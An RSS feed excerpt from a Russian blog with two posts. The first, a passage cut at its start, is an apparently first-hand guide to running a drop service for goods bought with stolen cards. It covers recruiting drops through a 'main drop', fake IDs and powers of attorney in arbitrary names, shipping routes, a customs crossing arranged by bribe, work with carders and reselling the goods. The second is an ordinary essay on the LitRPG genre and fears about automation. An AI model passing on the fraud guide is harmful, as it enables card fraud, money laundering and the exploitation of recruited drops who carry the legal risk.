    <li id="D1Ke">Всегда ищите в US (к примеру) шопах опцию оплаты налога.</li>
    <li id="QVZI">Если нет - трясите саппорта, решайте с ним. Потому что платить придется и не мало.</li>
    <li id="VXpJ">Работайте по Евро зоне. Товары, пришедшие из стран Евросоюза налогом не облагаются.</li>
    <li id="u3Q0">Если варианта нет, то не оплачивайте ни в коем случае TAX каржем. 50/50 прокатит и доедет Ваш небольшой пак либо подставите дропа/пак замнет таможня. Когда осталось всего лишь получить долгожданный товар - просто сделайте так, чтобы Вы получили именно его, а не головную боль.</li>
  </ul>
  <p id="pz0L"><strong>Отправка пака от дропа к клиенту</strong></p>
  <p id="ySjg">Самый быстрый и дорогой способ отправки:</p>
  <ul id="rhwU">
    <li id="eMie">DHL</li>
    <li id="2Pbn">UPS (который кстати, почему-то очень туго пропускает посылки в RU, заставляет людей приезжать на таможню. 2 раза уже такое было)</li>
  </ul>
  <p id="iy4O">Самый дешевый способ отправки:</p>
  <ul id="nkcY">
    <li id="nL0Z">Почта страны отправителя (гос. Почта, которая не облагается налогом). Компромисс цены и скорости доставки:</li>
    <li id="9ZIO">EMS</li>
  </ul>
  <p id="GlGv">Я отправлял каждой из этих курьерских служб, скажу откровенно, кроме скорости доставки ничем не отличается. Иногда EMS присылала паки, которые видимо были вскрыты на таможне, там от коробки почти ничего не оставалось, но с содержимым все нормально было.</p>
  <p id="YjPm">Постоянно интересуются люди, напишу что творится с пересылом на сегодняшний день</p>
  <p id="Pihm">DHL/UPS - доставка стоит 100$/200$ (авиа, 1-3 дня)</p>
  <p id="tY8l">Гос. почта (Почта Польши) / EMS - доставка стоит 25$/45$</p>
  <p id="59N2">Это минимальные ставки. Срок доставки к МСК (5-9)/(3-7) - Почта Польши/ЕМС соответственно.</p>
  <p id="0oke">Если планируете заниматся дроповодством в дальнейшем - советую строить структуру: дроп отвозит на склад, со склада белый дроп занимается рассылкой. Не отсылайте с дропа, который принял пак напрямую. Не подставляйте получателя. Это первое. И потом наберетесь еще проблем, когда случится так, что дроп достанет айфон с посылки, и положит туда мусор. На складе всегда можно самому удостовериться в том, что приехало.</p>
  <p id="ahiK"><strong>Легализовать черный бизнес: Своя небольшая курьерская фирма в EU</strong></p>
  <p id="sO3k">Я очень много интересовался этой темой. Встречался с людьми, которые этим занимались серьезно, включая бывшего директора международных посылок «новой почты». Очень много нюансов, которые я до этих пор не узнал.</p>
  <p id="HEgg">Если говорить вкратце. Если вы хотите начать возить посылки с ЕУ в СНГ, обязательно нужно получить лицензию (купить фирму с ней) на почтовую деятельность (на таможне не будете стоять, вас пускают по отдельному пасу, вы не несете ответственности за содержимое пересылок, и еще дюжина привилегий).</p>
  <p id="I8N6">В дальнейшем думаю серьезно этим заняться, но пришёл к выводу, что если иметь цель взять на себя именно международный трафик, так или иначе, нужно начинать с малой курьерской службы. Поживем - увидим..</p>
  <h2 id="OD8C">Вопрос/ответ</h2>
  <p id="i5A4"><strong>Как справляешься с перепродажей такого большого количества стафа? быстро нашел покупателя? продаешь опт в польше и по ЕУ?</strong></p>
  <p id="LFhu">Что касаемо перепродажи. Очень много нюансов, это уже будет другая лекция по скуп сервису)</p>
  <p id="Q6sh"><strong>Вопрос о дропах которые получают посыль уже в РУ, при пересыле с посреда ЮСА нужен ли он в твоем городе? или на себя можно с посреда с юса отправлять? На себя всмысле на вымышленные ФИО и делать ВУЛ?</strong></p>
  <p id="9szt">Я бы не отправлял на себя конечно же. Не нужно забывать, что это чернуха. Куча текстов есть, как работают посреды, они вообще отдельная тема, с ними свои нюансы. Но принимать только на дропов</p>
  <p id="GfOb"><strong>1. какие моменты возникали при оформление mail forwarding сервиса, особенно в UK интересует, по опыту знакомых?</strong></p>
  <p id="4hbm"><strong>2. Что может полиция потребовать от владельца такого сервиса кроме как вернуть посылку (если та еще находится на складе)?</strong></p>
  <p id="KfPM"><strong>3. Тема по отелям, которую ты описывал, думал о такой, только не думаешь что отель на ресепшене попросту не будут принимать посылку если там имя не на их постояльца?</strong></p>
  <p id="eVCi"><strong>4. По поводу fake id - что ты имеешь в виду? Каждому дропу брать фейк ИД? или только под необходимый стафф, который нужно забрать у курьерки?</strong></p>
  <p id="fgzf"><strong>5. Твои клиенты отправляю на имя дропа паки или ты ставишь любое имя?</strong></p>
  <p id="rKEe"><strong>6. Если паки отправлены на другое имя, а получаетль ��меет совсем другое ID - курьерки спрашивают ID при передачи стаффа?</strong></p>
  <p id="JKOs"><strong>7. Работая по схеме дропов нужно поставить за условие, чтобы мат использованный был не страны дропа? Это существенно упрощает процесс работы в целом?</strong></p>
  <p id="0rPN"><strong>8. По поводу фирмы регистрации и оформления 5-10 дропов. Имеешь в виду регистрацию реальной фирмы и реального оформления людей по договорам на эту фирму? Не слишком жирно будет тратить деньги на одну фирму только для 5-10 дропов?</strong></p>
  <p id="rQpj"><strong>9. Стоит ли отправлять дропа на непосредственный склад? Не палевно ли это в случае когда возможно дропа примут и он скажет куда все отсылал?</strong></p>
  <p id="g8yN"><strong>10. Для mail forwarding сервиса нужна какая-то лицензия по EU? Относится ли этот бизнес к курьерке?</strong></p>
  <p id="bCDP">1. Это нужно писать stassy (думаю, камнями не закидает, поможет).</p>
  <p id="okJw">2. Документы на деятельность, накладные по пакам, накладные по налогам (рассчеты).</p>
  <p id="keme">3. Бывает что для КХ оставляют посылки. Но я не работаю с таким, т. к. есть риск потерять посылку. А посылки мы не теряем.</p>
  <p id="9u7z">4. Да, можно брать каждому дропу отдельно idшки. И принимать на них много раз.</p>
  <p id="OVvO">5. Я ставлю любые имена. В день около 5-10 доверенностей идет.</p>
  <p id="vzGt">6. Обычно нет, если пересекаетесь с курьером, он вообще не смотрит (хотя бы у нас).</p>
  <p id="96Up">7. Да, это удаляет 90% проблем ненужных.</p>
  <p id="NHW8">8. А кто сказал, что ограничиться можно 5-10 сотрудниками. Такую же фирму можно открыть и на самых дропов. И устроить на неё и 50 людей. Вопрос только в том, когда фирма упадет.</p>
  <p id="GSxI">9. Я отправляю на выезды. Но только не разводных. Нужно обученых отправлять.</p>
  <p id="BiDD">10. Насколько мне известно - не нужны лицензии для посредника.</p>
  <p id="zaG7">Знаю ищут еще на сайтах по предложениях работы. Но это очень трудозатратно. Находите 1 дропа, и делайте с него мультидропа</p>
  <p id="DHfa">Доверенности дают сколько угодно ФИО, вытянуть пак можно с любого адреса. А купить 20 телефонов, и 40 симок - не проблемно вообще.</p>
  <p id="r8Ap"><strong>Подскажешь как обстоят дела с дропами и работой по Украине, и что делать с таможенным лимитом?</strong></p>
  <p id="W6P2">Да, что важно - вообще забыл - обход таможни. Для работы с сервисами, которые умно рассылают паки - не нужно дропов в УА. Обход таможни у нас через зеленый пас ездит бусс, таможня договоренная (парни сигареты возят в Польшу, провозят наш стафф)</p>
  <p id="9XP1"><strong>Как лучше всего искать дропов окромя соц сетей? например &quot;кататели тележек в тц?&quot; Есть какие то особые тонкости не использовав СИ? как лучше рассчитываться с дропом, товаром или деньгами?</strong></p>
  <p id="eGxB">Я плачу только деньгами. Не показывайте дропам стафф! Когда он увидит часы за 5к евро, он пересмотрит отношения между вами. И еще, никогда не разрешайте открывать посылки дропам [18:28:31]</p>
  <p id="bSXY"><strong>Что такое &quot;дроп панель&quot;? Сколько денег нужно для старта сервиса? (по личному опыту) на сколько актуально данное направление, если заниматься по Финляндии?</strong></p>
  <p id="6s9r">Дроп панель - Даже не описать. Грубо говоря, продукт, который серьезно упрощает работу с товаром, вбивалами и др. Можно найти на форумах описание и функционал. Стартовый капитал: 0 при умном распределении ресурсов. По Финляндии не подскажу</p>
  <p id="7VvX"><strong>1) Что такое &quot;дроп панель&quot;? 2) Часто мусора принимают дропов в ру? 3) Сколько денег нужно для старта сервиса? (по личному опыту)</strong></p>
  <p id="PEGY">По ру не работаю, не подскажу по полиции. По деньгам - не нужно ничего почти. Только ваши ягодицы на территории ЕС/USA</p>
  <p id="dKTG"><strong>Есть спрос на дропов и в целом на адреса по типу дроп сервиса со скупкой по UK?</strong></p>
  <p id="EyY1">Да, по UK и по DE самые &quot;нужные&quot; страны в ЕУ. Дальше идет Италия, Австрия, Франция.</p>
  <p id="raqC"><strong>Что если дистанционно открыть юр . лицо + купить почтовую лицензию (международные посылки) - ряд компаний предоставляет такой сервис, есть информацию по прайсу или другая полезная информация?</strong></p>
  <p id="Ceb4">Это уже в ЛС, ибо тема, в которой можно флудить вечно</p>
  <p id="FrK6"><strong>Как насчет язывовых барьеров? На скольких языках у вас саппорт? (насколько я понял)</strong></p>
  <p id="g3tw">На одном языке. Я сам себе саппорт. Что касаемо языкового барьера - о чем речь? Я работаю только со вбивалами с СНГ</p>
  <p id="caVm"><strong>Можно поподробнее насчет доверки узнать, как делается и вообще как выглядит?</strong></p>
  <p id="c5ac">Обычная доверенность. Доверенность - что мол человек X разрешает человеку Y принимать посыылки от 21,11 до 21,12</p>
  <p id="7leJ"><strong>Где взять профи кардеров? которые бы не спрашивали дай шопы дай бины и в бей за нас ...</strong></p>
  <p id="ppwn">Я работал 4 месяца, чтобы таких найти. Только со временем отсеиваешь балаболов от толковых вбивал</p>
  <p id="bohe"><strong>Имеются ли какие-нибудь договоренности или связи с сотрудниками курьерских служб? Если да, то как их правильно наладить?</strong></p>
  <p id="raed">У меня нету.</p>
  <p id="SAjt"><strong>Дядя Степа а ты лично виделся только с девкой этой главным дропом?</strong></p>
  <p id="zmKK">Конечно, я ей даже &quot;собеседование&quot; проводил. Нужно искать таких людей, которые вас не сдадут</p>
  <p id="RKVe"><strong>В смысле с остальными нет?</strong></p>
  <p id="Z6Dz">Да, с дропами работает она, я работаю с ней</p>
  <p id="wy43"><strong>Если это разводные дропы то это очень сложно</strong></p>
  <p id="dCVU">Если очень захотеть, можно в космос полететь (так говорили коммунисты)</p>
  <p id="9gkm"><strong>Вопрос некорректный но все же думаю многим интересен, можешь описать доход/прибыль в таком виде: 1й месяц работы сервиса, кол-во дропов, доход. 2й месяц, 3й и последний месяц.</strong></p>
  <p id="hghX">За первый месяц в сервисе было 5 паков. За последний 400, под НГ не работает никто, а я не уехал отдыхать. Паки с 4 стран пойдут на меня</p>
  <p id="s9W0">Ожидаю около 600 паков</p>
  <p id="lSND"><strong>А как выходишь на контакт с дропами в конце вербовки? по концовке через посредника &quot;главного по дропам&quot;?. А как по началу, вербуешь через соц сети к примеру и даешь его контакт главному по дропам он везет ему договор сикает в уши дальше и все такое ? главный по дропам в курсе чем.</strong></p>
  <p id="Fi4E">Я уже не вербую, вербовал первых. Теперь все делает девушка. Это её проблемы. Она за это деньги получает. Главный дроп все понимает, знает что делать в экстренных ситуациях.</p>
  <p id="aes9"><strong>Дядя Стёпа: по опыту, если открывал фирму, то в той же стране где дропы принимали стафф? работаем просто по ЮСЕ, мы сделали просто печати РУ фирмы, которой не существует. В твоем случаи, если бы к дропу пришли и он показал договор (а точнее скан договора, который ему отправили по почте) то копам бы этого было достаточно? спасибо)</strong></p>
  <p id="SriV">Его бы депортировали или посадили бы. Это не показаеть вообще. Нужен договор как минимум такой же американский.</p>
  <p id="GSJn"><strong>Расскажи все таки в пару словах как организовывал сбыт</strong></p>
  <p id="WI8f">Продаю через польский &quot;авито&quot;, &quot;ебей&quot; свой магазин интернет (туда еще время от времени черные транзы пускаю). Т.е - через доски объявлений, аукционы и магазин.</p>
  <p id="T1ue"><strong>Не много не понял - дропы принимают посылки, дальше их собирает мультидроп с них и везет к вам на склад? Неужели ни один дроп ни разу не спалил мультидропа, а этот самый мульдроп крепенько взятый за жабры не сказал про склад? ТО ЕСТЬ с первого раза удалось найти таких надежных людей?</strong></p>
  <p id="cLc5">Может повезло. Главный дроп ездит собирает со всех, его дело собрать, чекнуть по трекам. Он даже не знает, где склад, перевозы везут все на склад, оттуда уже белый дроп рассылает, рассылал бы и я, но могут сп��ос взять, почему в ру столько паков заганяете.</p>
  <p id="iUZ8"><strong>Дядя Стёпа: то есть если к нему придут, то по твоей версии - ему триндец?)</strong></p>
  <p id="kTNx">Да, вроде как так. Тут нужно смотреть, как отреагируют полиция. Тем более в ЮСА. Я знаю, чего ожидать от поляков. И исходя из этого - так и работаю</p>
  <p id="3hhy"><strong>Считаешь ли нужным между тобой и главным по дропам вставить еще одно звено , чтобы ты касался только денег?)</strong></p>
  <p id="DinZ">Думаю не имеет смысла. Очень длинная цепочка, а все хотят денег. В Польше - точно не надо.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@redterror/SkUcxU8fV</guid><link>https://teletype.in/@redterror/SkUcxU8fV?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror</link><comments>https://teletype.in/@redterror/SkUcxU8fV?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=redterror#comments</comments><dc:creator>redterror</dc:creator><title>От ЛитРПГ к футорологии. Или будущее в современном жанре.</title><pubDate>Fri, 11 Jan 2019 17:21:18 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/22/22d43a97-6621-465c-9161-88acb4c007a6.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/22/221f5a98-c0f8-459c-ad13-cc92a12afcdc.png"></img>Нихау, бегущие в тенях! Привет, случайный подписчик. Сегодня предлагаю отдохнуть зимним вечерком (или деньком) с каким-нибудь занимательным чтивом в руках. Например, прочитать книжечку ЛитРПГ. SR решили пройтись по этой теме, потому что она так или иначе затрагивает киберпространство. А возможно, частично отражает наше не особо далёкое будущее.]]></description><content:encoded><![CDATA[
  <figure id="1lWf" class="m_column">
    <img src="https://teletype.in/files/22/221f5a98-c0f8-459c-ad13-cc92a12afcdc.png" width="1920" />
  </figure>
  <p id="dxgT"><strong>Нихау, бегущие в тенях! Привет, случайный подписчик. Сегодня предлагаю отдохнуть зимним вечерком (или деньком) с каким-нибудь занимательным чтивом в руках. Например, прочитать книжечку ЛитРПГ. <a href="https://t.me/shadowruntime" target="_blank">SR</a> решили пройтись по этой теме, потому что она так или иначе затрагивает киберпространство. А возможно, частично отражает наше не особо далёкое будущее.</strong></p>
  <h3 id="aK19"><strong>Поехали:</strong></h3>
  <p id="XMbB"><strong>Эту статью изначально предполагалось посвятить достаточно узкой проблематике – появлению в России нового жанра фантастики</strong>, так называемого <strong><em>ЛитРПГ</em></strong>, описывающего ситуации, в рамках которых герои живут внутри виртуальных компьютерных ролевых игр – RPG (role-playing game). Однако, в ходе работы выяснилось, что, возможно, этот новый и не слишком изысканный в литературном отношении жанр является своеобразным отражением глобальных тенденций, имеющих далеко не только литературное значение. Поэтому, начавшись как попытка описать феномен ЛитРПГ, наше небольшое исследование плавно перетекло в область футурологии. Как мы намереваемся показать ниже, произведения жанра ЛитРПГ являют собой причудливую смесь страхов и ожиданий, связанных с недалеким будущим. И хотя сам факт их присутствия в фантастических произведениях вполне обычен (страхи и ожидания выполняют там функцию плохо детализированного фона), однако их конкретные особенности представляют несомненный интерес с точки зрения обществоведа.</p>
  <h2 id="lULW"><strong>Итак, что же такое ЛитРПГ?</strong></h2>
  <p id="JCHy"><strong>Жанр ЛитРПГ, о котором пойдет речь ниже, сравнительно нов. </strong>Хотя отдельные авторы создавали нечто напоминающее ЛитРПГ и ранее, в массовом порядке произведения, четко соответствующие канонам этого жанра, начали появляться два-три года назад. Зарубежным основателем жанра считают корейского писателя Хесунг Нама. Среди отечественных назовем имена А. <a href="https://www.litmir.me/a/?id=63048" target="_blank">Маханенко</a>, Д. <a href="http://d-rus.ru/" target="_blank">Руса</a>, А. Абвова, <a href="https://litnet.com/ru/book/prekrasnyi-novyi-mir-nachalo-b69061" target="_blank">Рэда Шухова</a>, А. <a href="https://www.litmir.me/a/?id=90" target="_blank">Каменистого</a>, А. <a href="https://www.litmir.me/a/?id=72205" target="_blank">Андросенко</a>, А. Арсеньева, Д. Ушакова, М. Михайлова, М. Дулепы, А. Лавина и др. На сегодняшний день можно насчитать уже сотни авторов, опубликовавших в жанре ЛитРПГ тысячи книг – как в традиционном, так и в электронном виде.</p>
  <figure id="zLqL" class="m_column">
    <img src="https://teletype.in/files/b7/b791e3b2-c969-41fd-b3db-d50161d6c91c.png" width="566" />
  </figure>
  <h2 id="vYmy"><strong>Каковы характерные черты этого жанра?</strong></h2>
  <p id="iIfI"><strong>В относящихся к нему произведениях описывается процесс игры героя в виртуальные многопользовательские онлайн-игры недалекого будущего (ММОРПГ)</strong>.</p>
  <p id="XdGn">Многие компоненты ЛитРПГ встречались и раньше: в фэнтези, фанфиках, попаданческой фантастике и т.п. Отличием ЛитРПГ от прочих жанров является то, что путь развития героя – это путь игрока как такового, виртуального персонажа, аватары, чьи качества, способности и навыки – это «характеристики», обычно представленные в цифровом выражении. Его сражения и деяния описываются в «логах», его приключения – это «квесты». Эти особенности делают ЛитРПГ литературой «на любителя», порожденной, как нередко считается, реальным феноменом популярности ММОРПГ, в которые у нас и во всем мире играют миллионы. Действительно, любители фантастики и фэнтези <em>stricto sensu</em> могут найти все интересующие их составляющие в других жанрах. Мотивы эскапизма, бегства в фантазийные миры, «попаданчества», пути героя, усеянного многочисленными роялями и т.д. – ради этого произведения в жанре ЛитРПГ читать не обязательно. Все это есть, к примеру, в той же попаданческой фантастике, от которой содержательно ЛитРПГ отличается лишь тем, что в ней попаданчество обычно выступает как акт добровольный.</p>
  <p id="UEDq"><strong>Так, подобно «попаданцу», герой ЛитРПГ пользуется некоторым преимуществом, </strong>проистекающим из опыта прошлой жизни или вследствие удачного стечения обстоятельств; точно также он одержим идеей расширения спектра личных возможностей; подобным же образом он обычно прикипает душой к иному миру как более соответствующему его внутренним потребностям и т.п. В итоге получается, что поклонники ЛитРПГ читают тексты, написанные в соответствующем жанре, именно ради специфической «геймерской» составляющей, логов и цифр характеристик.</p>
  <figure id="AgdW" class="m_column">
    <img src="https://teletype.in/files/6e/6e028b01-c92e-4f13-8f3a-e767cc0ced0d.png" width="734" />
  </figure>
  <h2 id="yK3W"><strong>Почему жанр ЛитРПГ стал столь популярным?</strong></h2>
  <p id="Ofot"><strong>Если мы попытаемся ответить на этот вопрос, то анализ произведений, относящихся к этому жанру, как таковых даст немногое. </strong>Необходимо понять, какие социально-психологические, культурные, технологические и прочие изменения в реальном мире (не только в России, но и за рубежом) обусловили появление феномена ЛитРПГ. При этом, наибольшее любопытство вызывают не не столько виртуальные миры как таковые, сколько выступающие в качестве фона развития действия реальные миры будущего, которые выталкивают героев ЛитРПГ в виртуальное пространство. Очевидно, что в этих «фоновых», лишь скупыми штрихами обрисованных мирах будущего отражаются ожидания и опасения авторов и читателей – подчас смутные, но от этого не менее интересные.</p>
  <h3 id="kRMF"><strong>Реальный фон виртуальных миров</strong></h3>
  <p id="kCmY">Итак, попытаемся реконструировать воображаемое будущее, которое выталкивает героев в виртуальное пространство. Так, например, у Д. Колотилина описывается ситуация, в которой развитие индустрии виртуальных миров выступает как способ «утилизации» невостребованной рабочей силы и предотвращения социальных катаклизмов. Вследствие повальной роботизации и автоматизации миру оказываются больше не нужны людские ресурсы и от того людей повально «гонят» за пределы реального мира – т.е. в мир виртуальный:</p>
  <blockquote id="5NxQ">« - Сейчас гонят повально просто, спад бешеный, миру больше не нужны людские ресурсы, вся работа, даже интеллектуальная переводится под консервы.</blockquote>
  <blockquote id="1KTw">- Подо что?</blockquote>
  <blockquote id="ATsw">- Консервы – системы автоматизированного управления, контроля и развития или как-то так. Короче, нас заменили роботами с искусственным интеллектом, пока только в виде серверов расчета, но, думаю, скоро и в виде передвигающихся консервов, какие уже давно в шахтах и прочих опасных областях работают».</blockquote>
  <p id="hRO9"><strong>Альтернатива описана скупыми мазками:</strong></p>
  <blockquote id="eblT">«...в Европе все большее число граждан недовольны нынешней политикой Европравительства, все больше городов захлебывается в хаосе беспорядков. Вчерашние благополучные горожане выходят на улицы и устраивают погромы. Полиция не способна справиться своими силами, в некоторые столицы в том числе Париж, Берлин и Лондон вошли регулярные войска с тяжелой бронетехникой...». Зато там, где перевод граждан в виртуал совершается успешно, ситуация не в пример лучше: «...Председатель Правительства Российской Федерации выступил с очередным отчетом об экономической ситуации в стране. Он отметил рост ВВП, снижение инфляции и заметное снижение безработности...».</blockquote>
  <p id="q5Kn">У Рэда Шухова и В.Ушакова мы встречаем сходную картину. Сама игра появляется как результат осмысления учеными происходящих в мире процессов. <strong>Каковы же их выводы?</strong></p>
  <p id="ghLI"><strong>Они таковы:</strong></p>
  <blockquote id="shRF">«...в условиях современной структуры общества, когда перепроизводство влечет за собой избыточное количество рабочих рук и, как следствие, потребительское восприятие мира, мы решили обратиться к вам как к главе государства. …При сохранении существующего порядка вещей всего через 30–35 лет деградация общества выйдет на уровень, когда станет просто невозможно сохранить государство как структуру. Постепенно, но неуклонно будут разрушаться гражданские институты, наука, искусство, культура. Поскольку более 90 % граждан к тому моменту будут иждивенцами или крайне узкими специалистами, прогнозируется резкое падение уровня производства, в особенности в пищевой промышленности. В отсутствие полноценного обучения рабочим специальностям прогнозируется огромный, порядка 68 %, кадровый голод на уровне стратегически важных производств. В данных условиях вероятность потери страной политической независимости и территориальной целостности составит через 30 лет 56 %, далее вероятность возрастает на 2–3 % в каждый последующий год».</blockquote>
  <p id="Mi7c"><strong>У <a href="https://litnet.com/ru/book/prekrasnyi-novyi-mir-nachalo-b69061" target="_blank">Р. Шухова</a> прослеживается общий мотив глобализации мира:</strong></p>
  <blockquote id="8GTw"><em>“Российская Империя, Англо-Саксонский Альянс и Великая Восточная Империя объявили о подписании международной конвенции о “Космическом сотрудничестве”. Теперь в рамках программ “Space World 1” и “Space World 2” будет достигнуто соглашение в рамках проекта пилотирования...” RT News.</em></blockquote>
  <p id="U9kw"><strong>Тот же мотив утилизации «лишнего» населения обнаруживается и у Д. Руса:</strong></p>
  <blockquote id="kEyl">«Совершенно Секретно. Из Указа президента РФ о создании закрытого комплекса «Шаражка». …Провести подготовительную работу и настоять на оцифровке всех, кто старше 70 лет, а так же тех, чье состояние здоровья внушает опасение».</blockquote>
  <p id="rWmv"><strong>То же самое мы видим у А. Арсеньева:</strong></p>
  <blockquote id="uI1m">«Продай, что у тебя есть, купи капсулу виртуальности и &quot;десятиметровку&quot; в государственном доме, оплати игру, и играй до конца дней своих. Судя по всему, это была официальная политика правительства, думал я подавленно. Огромное количество Вселенных ждало своих игроков: Космическиe империи, Средневековье с магией или без. Миры разных писателей, и придуманные разработчиками, бери один, и наслаждайся… Я не понимал подобного подхода, ведь капсула, несмотря на автоматизацию, была недешевой. Кроме того, выделяли так называемую &quot;десятиметровку&quot; для жизни. Вcе удобства там были, но без роскоши. Мысль, которая возникала при этом, это то, что молодежь, не имея возможности для самореализации, просто поднимет бунт, и так ИМ просто дешевле… Мир словно охватила лихорадка. Новыe, &quot;Свободные миры&quot; оказался тем, что нужно. Миллионы людей подсели на него, после чего, делясь невероятными впечатлениями, государства стали выталкивать людей в этот отстойник. Особенно людей, которые не могли интегрироваться в общество по каким-либо причинам. Самый легкий путь… Сядь, играй, добейся всего, и оба мира будут прекрасны! Это твой путь к признанию в обществе! Тут тебя ждут!».</blockquote>
  <figure id="fsJc" class="m_column">
    <img src="https://teletype.in/files/32/329d445d-8626-4aa2-b779-647c553bc3a5.png" width="1920" />
  </figure>
  <p id="Gq3t">Нетрудно заметить, что здесь мотив утилизации переплетается с идеей необходимости удовлетворения потребностей людей, лишенных возможности самореализации в реальном мире.<strong> И в современном мире - мире глобализации всё к этому и идёт</strong>. Причем тут подразумеваются и банальные потребительские потребности: очевидно, что затраты ресурсов на дорогую капсулу виртуальности в общественном масштабе гораздо меньше, чем на удовлетворение потребностей людей в реальном мире.</p>
  <p id="3elK">Словом, как это уже присутствует у считающегося первопроходцем жанра ЛитРПГ Хесунг Нама,<strong> виртуальные миры будущего осмысливаются, в сущности, как «вторая», и едва ли не такая же полноценная как и «первая» реальность, в которой осуществляются человеческие желания:</strong> «“Королевская дорога” – это не обычная игра. Будь она лишь игрой, достаточно было бы одних боевых навыков?! Но с самого начала “Королевская дорога” создавалась как еще один мир. Как место, в котором можно провести еще одну жизнь. Виртуальная игра, взявшая за основу законы реального мира и оттого приобретшая еще большую глубину. И каким образом там развлекаться и осуществлять свои мечты, придется решать каждому лично».</p>
  <h3 id="uYK7"><strong>Реальные изменения как основа для предчувствий фантастов</strong></h3>
  <p id="3i2d"><strong>Существенными представляются причины будущего ухода людей в виртуальные миры, тесно связанные с проблемой возрастания количества «лишних людей» или же перспективой такого увеличения.</strong> В более общих понятиях эта проблема осмысливается как проблема «технологического замещения», порожденная возникновением новых технологий, которые радикально сокращают потребность в человеческом участии в производстве товаров и услуг.</p>
  <p id="Qkf4"><strong>Так, например, Б. Гейтс предсказывает, что в скором будущем появятся:</strong></p>
  <blockquote id="G69Y">«программные субституты для самой разной деятельности – будь то водители, официанты или сиделки. … Эти технологии прогрессируют. … Со временем технология будет снижать спрос в работе, особенно в нижней части профессионального спектра. … Через 20 лет спрос на труд во многих областях деятельности будет существенно ниже, чем сегодня. И я не думаю, что люди удерживают этот нюанс в своей ментальной модели». И Гейтс не единственный, кто предсказывает не радужный сценарий для рабочих. В январе «Economist» опубликовал крупный материал, в котором назвал больше дюжины профессий, которые практически гарантированно будут отданы роботам в ближайшие 20 лет, включая телемаркетинг, бухгалтерию и розничные продажи».</blockquote>
  <p id="l8Ja"><strong>Другое предложение заключается в том, чтобы решить проблемы «лишних людей» путем банальной раздачи денег. </strong>Тем, кому не нравится идея раздачи наличности, тем</p>
  <blockquote id="oEM5">«достаточно представить себе, что бедные домохозяйства неожиданно получили наследство или налоговые льготы. Наследство – это передача богатства, которое получатель не заслужил. Однако время и объем получаемого наследства не поддаются контролю со стороны бенефициара. Точно так же прямые трансфертные платежи со стороны правительства, в переводе с финансовой терминологии, – то же самое, что подарок, сделанный членом семьи». Иными словами, тут уже почти прямо предлагается содержание людей за счет ренты.</blockquote>
  <p id="KAQg"><strong>В ЛитРПГ, таким образом, присутствует смесь страхов и надежд, связанных с будущим.</strong> Угроза возрастающей безработицы, неполная занятость, и другие подобные факторы у нас и за рубежом выталкивают людей на обочину реальной жизни, в ряды «прекариата». Кроме того, надо учесть и факт падения значимости труда как средства, которое скрепляет собственно «общество». Возникает проблема: что будет играть аналогичную роль в обществе будущего? Не превратится ли социум, в котором большинство индивидов уже не занято общественно-полезным трудом, в сборище маргиналов или же найдет оправдание своего существования в чем-то ином? И может быть, такое оправдание найдено внутри виртуальных миров?</p>
  <p id="MuTI"><strong>Эти страхи и надежды выражаются не напрямую; они проступают за фасадами увлекательных картин жизни героя в виртуальном мире, ноо от этого не становятся менее реальными. </strong>Ведь это надежды и страхи обусловлены подсознательным ощущением все возрастающей (пусть даже применительно к поколению детей создателей ЛитРПГ) угрозы оказаться «лишними» в реальном мире, когда возникнет необходимость искать свое место … да хотя бы в мире виртуальном. Мы имеем дело с неизбежными издержками становления нового культурного компенсационного механизма. И ЛитРПГ, среди прочего, отражает и то, каким бы многие хотели видеть этот механизм в будущем.</p>
  <figure id="Ahuq" class="m_column">
    <img src="https://teletype.in/files/11/119bf0c4-676e-43dc-adc6-7026cc71ca6b.jpeg" width="1280" />
  </figure>
  <h3 id="3Lol"><strong>Закат капитализма или его виртуальное торжество?</strong></h3>
  <p id="cml9">Стоит отметить, что в ЛитРПГ виртуальные миры предстают как важная часть реальной экономики и общественной жизни. Практически у всех авторов, пишущих в этом жанре, экономика виртуальных миров будущего выступает в качестве важной части экономики реальной, порой – вплоть до ситуации, когда валюты реального мира ценятся гораздо меньше, чем игровые. Последние конвертируются в реальные деньги, люди зарабатывают в виртуальной жизни средства к существованию и т.п.</p>
  <p id="28Vq"><strong>Так, герой цикла «Лунный скульптор» Хесунга Нама, считающегося основоположником жанра, и вовсе начинает играть исключительно с целью решить материальные проблемы своей семьи.</strong> Виртуальная жизнь описывается как нечто, являющееся почти настоящей реальностью, даже скорее – полноправной частью «реальной реальности», экономикой воспроизводства того, благодаря чему неполноценные чувствуют себя полноценными, а лишние – востребованными. Люди добиваются самореализации, живя и зарабатывая в виртуальных мирах.</p>
  <h2 id="8CFh"><strong>Но каким образом?</strong></h2>
  <p id="FDpV"><strong>В реальном мире есть три основных способа самореализации и заработка: общественная жизнь, творчество и труд, причем последний в разных его проявлениях является основным.</strong> Поскольку виртуальные миры – это «вторая реальность», изначально создававшаяся для проведения в ней досуга, то труд в ней трансформируется весьма специфическим образом.</p>
  <p id="nFjY">В виртуальных мирах он воплощается в деятельность по сбору ресурсов и производству разного рода необходимых в игре «предметов». Но такой труд, по своей сути, является лишь симуляцией, которая не сопровождается развитием реальных навыков и знаний. Успех или неудача в «производстве» такого рода определяется выраженными в цифрах показателями уровня развития навыков в ремесле, наличия инструментов, затратами рабочего времени и материала, хотя на самом деле реальным оказывается лишь затраченное рабочее время. В этом смысле в ЛитРПГ мы наблюдаем отражение принципов капиталистической экономики почти в марксовом смысле: труд оценивается в предельно абстрактном выражении затрат рабочего времени.</p>
  <p id="KTBQ"><strong>При этом, далеко не последнее место в виртуальных мирах ЛитРПГ занимают ценности самореализации и личностного роста. </strong>Но оба эти фактора выступают как нечто формальное и карикатурное, в виде перечня выраженных в цифрах уровней развития навыков и умений. Такой подход мало отличается, например, от представлений об успешности реальной социализации, оцениваемой по количеству «френдов» или «лайков» в социальных сетях.</p>
